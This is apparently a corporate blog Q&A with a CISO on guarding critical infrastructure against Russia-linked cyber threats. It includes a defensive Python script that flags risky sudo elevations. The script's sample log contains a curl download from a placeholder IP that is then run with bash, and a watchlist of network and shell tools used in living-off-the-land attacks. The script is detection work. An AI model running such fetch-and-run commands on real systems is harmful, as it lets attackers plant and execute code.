Along with the rest of the world, our team has been closely following Russia’s attack on Ukraine. Many organizations are currently working hard to bolster their security against potential cyber threats coming out of Russia. While there are no specific cyber threats to the U.S. at this time, CISA has issued a directive asking critical infrastructure organizations to increase their defenses.
We’ve asked our CISO Bill Lawrence a few questions about the current crisis in Ukraine and what critical infrastructure organizations can do now to protect against cyber threats.
Should critical infrastructure organizations be doing something different in response, or just more of the same (i.e., continue doing assessments, business impact analyses, remediating vulnerabilities, etc.)?
It is very hard to gauge what might happen in the current scenario, especially once veiled threats of nuclear warfare have been made by President Putin. It is a false hope that Russian cyber-attacks that are targeted in Ukraine might not get copied and used by other actors on other targets; once a cyber ‘arrow’ is shot, everyone can get their hands on the code. Also, while official Russian cyber forces are highly engaged in this conflict, they may get re-tasked to sow confusion or destruction in other arenas, or the teeming masses of cyber criminals may be exhorted to do more for Mother Russia and escalate their campaigns against the West. Staying the course with risk assessments, remediations to fix gaps, and urgently protecting the most critical assets of the company should continue to be the way ahead against these threats as well as others.
As in the case of the SolarWinds hack, some attacks take months before they are finally discovered. What are some practical recommendations to prepare for/mitigate attacks that are incremental, targeted, and continuous?
First, tightened, role-based access controls with accounts locked down with MFA have become table stakes. Visibility over all privilege elevations can help find when adversaries might be ‘living off the land’ and using existing system tools for their purposes, which still require root/admin permissions. Code signing and monitoring can catch malicious code injections. Take in and share information with ISACs/ISAOs, private sector feeds, and government ones. Advanced organizations can implement behavioral analysis on accounts for anomalous activity as well as ‘hunt’ teams to search systems for signs that someone lurks there.
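One concrete form of the “visibility over privilege elevations” described above, offered here as an added example rather than code from the original post or from the company: a small Python script that parses syslog-style sudo records and flags elevations by accounts not approved to elevate, elevations outside business hours, elevations through built-in tools commonly abused when ‘living off the land’, and commands that touch sensitive files. The log lines, the approved-account list, the business-hours window, the watchlist and the sensitive-path list are all constructed assumptions to be replaced with an organization’s own policy.

```python
import os
import re
from collections import Counter

# Constructed, syslog-style sudo records (sample data, not real logs).
SAMPLE_LOG = """\
Mar  1 09:12:03 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/systemctl restart nginx
Mar  1 09:40:17 web01 sudo:      bob : TTY=pts/1 ; PWD=/home/bob ; USER=root ; COMMAND=/usr/bin/apt-get update
Mar  1 23:55:41 web01 sudo: svc-backup : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/usr/bin/curl http://203.0.113.10/x.sh
Mar  1 23:56:02 web01 sudo: svc-backup : TTY=unknown ; PWD=/ ; USER=root ; COMMAND=/bin/bash /tmp/x.sh
Mar  2 02:13:55 web01 sudo:    alice : TTY=pts/0 ; PWD=/home/alice ; USER=root ; COMMAND=/usr/bin/vim /etc/sudoers
"""

# Hypothetical policy inputs: who may elevate, and during which hours.
APPROVED_ELEVATORS = {"alice", "bob"}
BUSINESS_HOURS = (8, 18)  # 08:00 inclusive to 18:00 exclusive
# Built-in tools frequently seen in "living off the land" activity (assumed watchlist).
LOLBIN_WATCHLIST = {"curl", "wget", "bash", "sh", "nc", "python3", "perl"}
SENSITIVE_PATHS = ("/etc/sudoers", "/etc/shadow", "/etc/passwd", "/root/.ssh")

SUDO_RE = re.compile(
    r"^\w{3}\s+\d+ (?P<hour>\d\d):\d\d:\d\d (?P<host>\S+) sudo:\s+"
    r"(?P<user>\S+) : .*?USER=(?P<target>\S+) ; COMMAND=(?P<cmd>.*)$"
)


def parse_sudo_line(line):
    """Return a dict for a sudo elevation record, or None for any other line."""
    m = SUDO_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["hour"] = int(ev["hour"])
    return ev


def flag_elevation(ev, approved=APPROVED_ELEVATORS, hours=BUSINESS_HOURS):
    """Return the reasons an elevation deserves analyst review (empty list if none)."""
    reasons = []
    if ev["user"] not in approved:
        reasons.append("account not approved for elevation")
    if not (hours[0] <= ev["hour"] < hours[1]):
        reasons.append("elevation outside business hours")
    parts = ev["cmd"].split()
    binary = os.path.basename(parts[0]) if parts else ""
    if binary in LOLBIN_WATCHLIST:
        reasons.append(f"watchlisted binary run as {ev['target']}: {binary}")
    if any(p in ev["cmd"] for p in SENSITIVE_PATHS):
        reasons.append("touches a sensitive path")
    return reasons


def analyze(log_text, approved=APPROVED_ELEVATORS):
    """Scan log text and return (user, command, reasons) for every flagged elevation."""
    findings = []
    for line in log_text.splitlines():
        ev = parse_sudo_line(line)
        if ev is None:
            continue  # not a sudo record; other daemons' lines are skipped
        reasons = flag_elevation(ev, approved)
        if reasons:
            findings.append((ev["user"], ev["cmd"], reasons))
    return findings


def per_account_summary(findings):
    """Count flagged elevations per account to show which identity to review first."""
    return Counter(user for user, _, _ in findings)


if __name__ == "__main__":
    results = analyze(SAMPLE_LOG)
    for user, cmd, reasons in results:
        print(f"{user}: {cmd}\n    " + "\n    ".join(reasons))
    print(per_account_summary(results))
```

On the sample data, the two routine daytime elevations by approved accounts produce nothing, the service account’s two off-hours elevations through curl and bash are flagged on three counts each, and the approved administrator’s 02:13 edit of /etc/sudoers is flagged for timing and for the file touched; that last case is the kind of event that MFA and role-based access alone would not surface, which is why elevation visibility complements them.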
IT hacks can lead to OT disasters. What advice would you give teams to increase alignment between traditionally siloed teams?
It starts with leadership and a shared purpose. Lacking those, getting to know each other’s capabilities, pain points, and major risks over coffee can help. Both environments want to protect equipment, but downtime or destruction of critical infrastructure can injure or kill. And you’d be hard-pressed to find a true ‘air gap’ between environments; focus on the connective points and work to minimize and better secure those.
What advice would you give to smaller operators with a small cybersecurity crew or one with a fledgling cybersecurity program?
You have to budget for training. If your people don’t have the skill set to run whatever tools they might have (system admin, even) you’re going to have huge gaps. Repeatable, tested processes. Then more advanced toolsets – there are some good SOCaaS solutions out there. Check out Threat Stack.
How should technical leaders communicate with non-technical leaders about what their teams are doing in response to this issue?
“We’re overworked and need more money.” But seriously, leaders should be able to point to recent or future training on the books to amp up team skills in powerful and timely fashion, any tightening and testing of policies and procedures (with a recent third-party pen test), and an example of how a recent attack in the news should be discovered at this company and mitigated rapidly by the team and their tools. Then work in the future budget needs.